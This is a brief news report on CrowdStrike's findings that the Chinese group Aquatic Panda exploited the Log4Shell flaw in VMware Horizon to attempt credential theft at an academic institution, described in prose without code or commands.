Chinese Attackers Utilize Log4Shell in Post-Exploitation Attacks

According to cybersecurity firm CrowdStrike, Chinese hackers are using the Log4Shell exploit tools to perform various post-exploitation operations. Aquatic Panda, the hacker group behind these malicious operations, was seen with the help of a large academic institution exploiting the Log4Shell vulnerability.

Aquatic Panda

Aquatic Panda is a Chinese hacking group that has been active since May 2020 and has two primary objectives:

1. Intelligence collection 
2. Industrial espionage

This hacking group primarily targets users from the following industries:

• Government sectors 
• Technology sectors 
• Telecommunication sectors 

Technical Analysis 

The Aquatic Panda uses a modified version of the exploit for a Log4j bug to gain initial access to the target system, and then it undertakes several post-exploitation activities, such as:-

• Credential collection
• Exploration 

The hackers attacked VMware Horizon, which used the vulnerable Log4j library to infiltrate a large academic institution. The code used in the attack was released on GitHub on December 13, 2021. The threat actors performed a connection check using DNS lookups for a subdomain running on VMware Horizon as part of Apache Tomcat.

The hackers extracted the malware and three VBS files using PowerShell commands, and additional scripts were used to accomplish this. At this point, the Aquatic Panda threat actors attempted several trials to collect credentials by performing memory dumps and preparing them for theft. 

Furthermore, the attacked academic institution was notified of suspicious activity, allowing it to implement the incident response protocol, patch vulnerable software quickly, and prevent the malicious activity from spreading further.